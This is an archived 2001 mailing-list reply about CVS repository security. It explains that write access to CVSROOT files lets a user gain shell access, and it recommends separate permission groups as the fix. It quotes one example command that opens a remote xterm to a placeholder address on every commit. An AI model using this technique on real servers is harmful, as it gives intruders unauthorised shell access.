[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: cvs security - ssh vs pserver?

On Tue, Nov 27, 2001 at 10:08:57AM -0800, Peter Jay Salzman wrote:
> joey, i have no problem with plain text passwords.
> just as long as they can't get _shell access_ with that password.


I'd just like to point out one thing that I didn't see in this thread
earlier:  if you have write access to the CVS repository, it is possible
to get shell access also.

Ok, it is not exactly that simple, I think it required write access to
the files in the CVSROOT-directory (commitinfo, etc.)  You could then
modify those files so that, for example, whenever you commit a file, a
command "xterm -display <yourip>:0" would be run on the server.

However, there is a simple fix.  Just don't let the users touch the
files in the CVSROOT directory.  Use another group for the CVSROOT, say
use group 'prj' for repository users who are allowed to commit changes
but not run shells, and 'prj-adm' for users who are allowed to modify
files in CVSROOT (and potentially run a shell.)

Unfortunately, I can't remember the details exactly and I don't have a
link at hand, so better read this message again with extreme prejudice.

Tommi Komulainen                                 Tommi.Komulainen@iki.fi
GPG 1024D/68388EE6    6FD6 DD79 EB38 BF6F 3533  09C0 04A8 9871 6838 8EE6

Attachment: pgpdTke07i2Y7.pgp
Description: PGP signature

Reply to: